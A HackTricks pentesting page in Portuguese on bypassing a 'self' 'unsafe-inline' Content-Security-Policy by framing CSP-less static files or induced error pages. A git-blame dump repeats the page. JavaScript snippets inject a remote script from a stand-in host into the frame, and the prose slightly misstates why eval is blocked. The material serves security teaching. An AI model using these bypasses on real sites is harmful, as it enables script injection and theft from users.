hacktricks/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Supporte o HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
{% endhint %}


Uma configuração como:
```
Content-Security-Policy: default-src 'self' 'unsafe-inline';
```
Proíbe o uso de quaisquer funções que executem código transmitido como uma string. Por exemplo: `eval, setTimeout, setInterval` serão todos bloqueados devido à configuração `unsafe-eval`

Qualquer conteúdo de fontes externas também é bloqueado, incluindo imagens, CSS, WebSockets e, especialmente, JS

### Via Texto & Imagens

Observa-se que navegadores modernos convertem imagens e textos em HTML para melhorar sua exibição (por exemplo, definindo fundos, centralizando, etc.). Consequentemente, se um arquivo de imagem ou texto, como `favicon.ico` ou `robots.txt`, for aberto via um `iframe`, ele é renderizado como HTML. Notavelmente, essas páginas geralmente não possuem cabeçalhos CSP e podem não incluir X-Frame-Options, permitindo a execução de JavaScript arbitrário a partir delas:
```javascript
frame=document.createElement("iframe");
frame.src="/css/bootstrap.min.css";
document.body.appendChild(frame);
script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);
```
### Via Errors

Da mesma forma, respostas de erro, como arquivos de texto ou imagens, geralmente vêm sem cabeçalhos CSP e podem omitir X-Frame-Options. Erros podem ser induzidos a carregar dentro de um iframe, permitindo as seguintes ações:
```javascript
// Inducing an nginx error
frame=document.createElement("iframe");
frame.src="/%2e%2e%2f";
document.body.appendChild(frame);

// Triggering an error with a long URL
frame=document.createElement("iframe");
frame.src="/"+"A".repeat(20000);
document.body.appendChild(frame);

// Generating an error via extensive cookies
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
frame=document.createElement("iframe");
frame.src="/";
document.body.appendChild(frame);
// Removal of cookies is crucial post-execution
for(var i=0;i<5;i++){document.cookie=i+"="}
```
Após acionar qualquer um dos cenários mencionados, a execução de JavaScript dentro do iframe é alcançável da seguinte forma:
```javascript
script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);
```
## Referências

* [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)


{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Suporte ao HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
{% endhint %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`<summary>Supporte o HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para o [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`Uma configuração como:`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`Content-Security-Policy: default-src 'self' 'unsafe-inline';`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			Proíbe o uso de quaisquer funções que executem código transmitido como uma string. Por exemplo: `eval, setTimeout, setInterval` serão todos bloqueados devido à configuração `unsafe-eval`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`Qualquer conteúdo de fontes externas também é bloqueado, incluindo imagens, CSS, WebSockets e, especialmente, JS`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`### Via Texto & Imagens`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			Observa-se que navegadores modernos convertem imagens e textos em HTML para melhorar sua exibição (por exemplo, definindo fundos, centralizando, etc.). Consequentemente, se um arquivo de imagem ou texto, como `favicon.ico` ou `robots.txt`, for aberto via um `iframe`, ele é renderizado como HTML. Notavelmente, essas páginas geralmente não possuem cabeçalhos CSP e podem não incluir X-Frame-Options, permitindo a execução de JavaScript arbitrário a partir delas:
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```javascript
			`frame=document.createElement("iframe");`
			`frame.src="/css/bootstrap.min.css";`
			`document.body.appendChild(frame);`
			`script=document.createElement('script');`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`script.src='//example.com/csp.js';`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`window.frames[0].document.head.appendChild(script);`
			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`### Via Errors`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`Da mesma forma, respostas de erro, como arquivos de texto ou imagens, geralmente vêm sem cabeçalhos CSP e podem omitir X-Frame-Options. Erros podem ser induzidos a carregar dentro de um iframe, permitindo as seguintes ações:`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```javascript
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`// Inducing an nginx error`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`frame=document.createElement("iframe");`
			`frame.src="/%2e%2e%2f";`
			`document.body.appendChild(frame);`

Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`// Triggering an error with a long URL`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`frame=document.createElement("iframe");`
			`frame.src="/"+"A".repeat(20000);`
			`document.body.appendChild(frame);`

Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`// Generating an error via extensive cookies`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};`
			`frame=document.createElement("iframe");`
			`frame.src="/";`
			`document.body.appendChild(frame);`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`// Removal of cookies is crucial post-execution`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`for(var i=0;i<5;i++){document.cookie=i+"="}`
			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`Após acionar qualquer um dos cenários mencionados, a execução de JavaScript dentro do iframe é alcançável da seguinte forma:`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```javascript
			`script=document.createElement('script');`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`script.src='//example.com/csp.js';`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`window.frames[0].document.head.appendChild(script);`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Referências`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
			`* [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`<summary>Suporte ao HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para o [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00			`{% endhint %}`